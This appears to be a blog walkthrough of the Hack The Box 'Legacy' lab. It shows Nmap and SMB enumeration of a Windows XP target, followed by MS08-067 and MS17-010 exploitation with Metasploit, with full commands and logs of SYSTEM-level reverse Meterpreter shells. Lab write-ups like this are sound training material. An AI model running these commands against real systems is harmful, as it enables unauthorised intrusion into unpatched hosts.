Hack The Box – Legacy Write-up

Initial Enumeration

Nmap

I begin with an Nmap scan of the target with nmap -sC -sV -oA nmap/legacy-initial 10.129.227.181 -Pn which returned:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 17:37 BST
Nmap scan report for 10.129.227.181
Host is up (0.045s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-07-29T21:35:07+03:00
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:1f:7d (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h27m38s, deviation: 2h07m16s, median: 4d22h57m38s

SMB

I used smbclient to try and view any available shares with smbclient -L 10.129.227.181 but this returned an error:

Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_INVALID_PARAMETER

Next, I used Nmap to see if any SMB vulnerabilites were present on the target with nmap --script smb-vuln* -p 139,445 10.129.227.181 – it indicates that the target was vulnerable to ms08-067 and ms17-010:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 17:47 BST
Nmap scan report for 10.129.227.181
Host is up (0.016s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

To try and exploit these vulnerabilities, I started metasploit with msfconsole -q. I began by searching for an ms08-067 vulnerability with the search ms08-067 command and one module was returned:

msf6 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

I selected this module with use 0 and used the show options command to see what information I needed to provide to the module:

msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.128    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

The RHOSTS value (the IP address of the target machine) was empty so I added this with set RHOSTS 10.129.227.181 and the LHOST value (the IP address of my Kali machine) wasn’t set to my VPN IP address so I changed this with set LHOST tun0.

tun0 is the name of my VPN interface and can be found with ip -a.

With all the required settings provided, I ran the command exploit to run the module.

This was a success and I received a Meterpreter session. I check which user this was running as with the getuid command and found I was the NT AUTHORITY\SYSTEM user:

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.43:4444 
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176198 bytes) to 10.129.227.181
[*] Meterpreter session 1 opened (10.10.14.43:4444 -> 10.129.227.181:1059) at 2024-07-24 18:06:23 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

I dropped into a shell with the shell command and checked the C:\Documents and Settings diectory to see which users had folders on the system:

eterpreter > shell
Process 2040 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>dir "C:\Documents and Settings"
dir "C:\Documents and Settings"
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings

16/03/2017  09:07     <DIR>          .
16/03/2017  09:07     <DIR>          ..
16/03/2017  09:07     <DIR>          Administrator
16/03/2017  08:29     <DIR>          All Users
16/03/2017  08:33     <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.297.014.272 bytes free

I found a john user and an Adminsitrator user.

The user.txt flag was found in the Desktop directory within the john directory:

C:\WINDOWS\system32>dir "C:\Documents and Settings\john\Desktop"
dir "C:\Documents and Settings\john\Desktop"
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john\Desktop

16/03/2017  09:19     <DIR>          .
16/03/2017  09:19     <DIR>          ..
16/03/2017  09:19                 32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.297.055.232 bytes free

C:\WINDOWS\system32>type "C:\Documents and Settings\john\Desktop\user.txt"
type "C:\Documents and Settings\john\Desktop\user.txt"
e69**************************44f

The root.txt flag was found in the Desktop directory within the Administrator directory and was read with the type <filepath> command:

C:\WINDOWS\system32>dir "C:\Documents and Settings\Administrator\Desktop"
dir "C:\Documents and Settings\Administrator\Desktop"
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator\Desktop

16/03/2017  09:18     <DIR>          .
16/03/2017  09:18     <DIR>          ..
16/03/2017  09:18                 32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.297.042.944 bytes free

C:\WINDOWS\system32>type "C:\Documents and Settings\Administrator\Desktop\root.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"
993**************************713

Post Exploitation

I wanted to check whether the target was also vulnerable to the ms17-010 vulnerabiltiy that nmap identified. I searched Metasploit modules with the search ms17-010 command and found five potential modules:

msf6 exploit(windows/smb/ms08_067_netapi) > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

I decided to try the exploit/windows/smb/ms17_010_psexec module first so selected this with use 1. I checked the information required by the module and found, again, that the RHOSTS value was missing and the LHOST value was incorrect. I updated these using the same method as above and ran the module with exploit.

I received a shell on the target as the NT AUTHORITY\SYSTEM user:

msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.43:4444 
[*] 10.129.227.181:445 - Target OS: Windows 5.1
[*] 10.129.227.181:445 - Filling barrel with fish... done
[*] 10.129.227.181:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.129.227.181:445 -        [*] Preparing dynamite...
[*] 10.129.227.181:445 -                [*] Trying stick 1 (x86)...Boom!
[*] 10.129.227.181:445 -        [+] Successfully Leaked Transaction!
[*] 10.129.227.181:445 -        [+] Successfully caught Fish-in-a-barrel
[*] 10.129.227.181:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.129.227.181:445 - Reading from CONNECTION struct at: 0x8635f780
[*] 10.129.227.181:445 - Built a write-what-where primitive...
[+] 10.129.227.181:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.227.181:445 - Selecting native target
[*] 10.129.227.181:445 - Uploading payload... dKYzsDBx.exe
[*] 10.129.227.181:445 - Created \dKYzsDBx.exe...
[+] 10.129.227.181:445 - Service started successfully...
[*] Sending stage (176198 bytes) to 10.129.227.181
[*] 10.129.227.181:445 - Deleting \dKYzsDBx.exe...
[*] Meterpreter session 2 opened (10.10.14.43:4444 -> 10.129.227.181:1060) at 2024-07-24 18:27:46 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Leave a Reply

Your email address will not be published. Required fields are marked *